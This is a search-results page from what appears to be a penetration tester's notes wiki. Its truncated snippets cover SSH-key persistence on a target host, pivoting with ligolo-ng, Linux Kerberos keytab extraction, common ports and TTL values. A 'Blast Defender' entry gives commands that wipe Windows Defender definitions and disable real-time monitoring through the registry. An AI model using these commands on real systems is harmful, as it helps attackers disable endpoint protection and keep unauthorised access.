Advanced Search
Search Results
44 total results found
5. Persistence
Linux - SSH On your host cat ~/.ssh/id_rsa.pub # if you don't have one create run: ssh-key -t rsa # copy the content of the file into **authorized_keys** on the target host On the target host cd ~/.ssh/ ssh-keygen -t rsa # press enter twice cat id_r...
6. Pivot
You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent ...
Linux AD
Tools required <https://github.com/its-a-feature/KeytabParser> <https://github.com/sosdave/KeyTabExtract> I usually install them under /opt/linuxad You will need to upload them on to the target host. Extracting keytab data Most likely you will need to ...
Blast Defender
Via command prompt cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinitions -all Just to be safe 🙂 REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM\\...
Certifications
CREST
Common Ports
Port Service 7 ECHO 9 Discard 13 Daytime 17 QotD (Quote of the Day) 19 Chargen 20 FTP (data) 21 FTP (control) 22 SSH 23 Telnet 43 Whois 49 TACACS+ 53 DNS 67...
TTL
The operating system sets the initial TTL value or application creating the IP packet. Here are some common default TTL values: Operating System TTL Value Linux/MAC OS, Android, Juniper 64 Windows 95, 98, NT 32 Windows 128 Ci...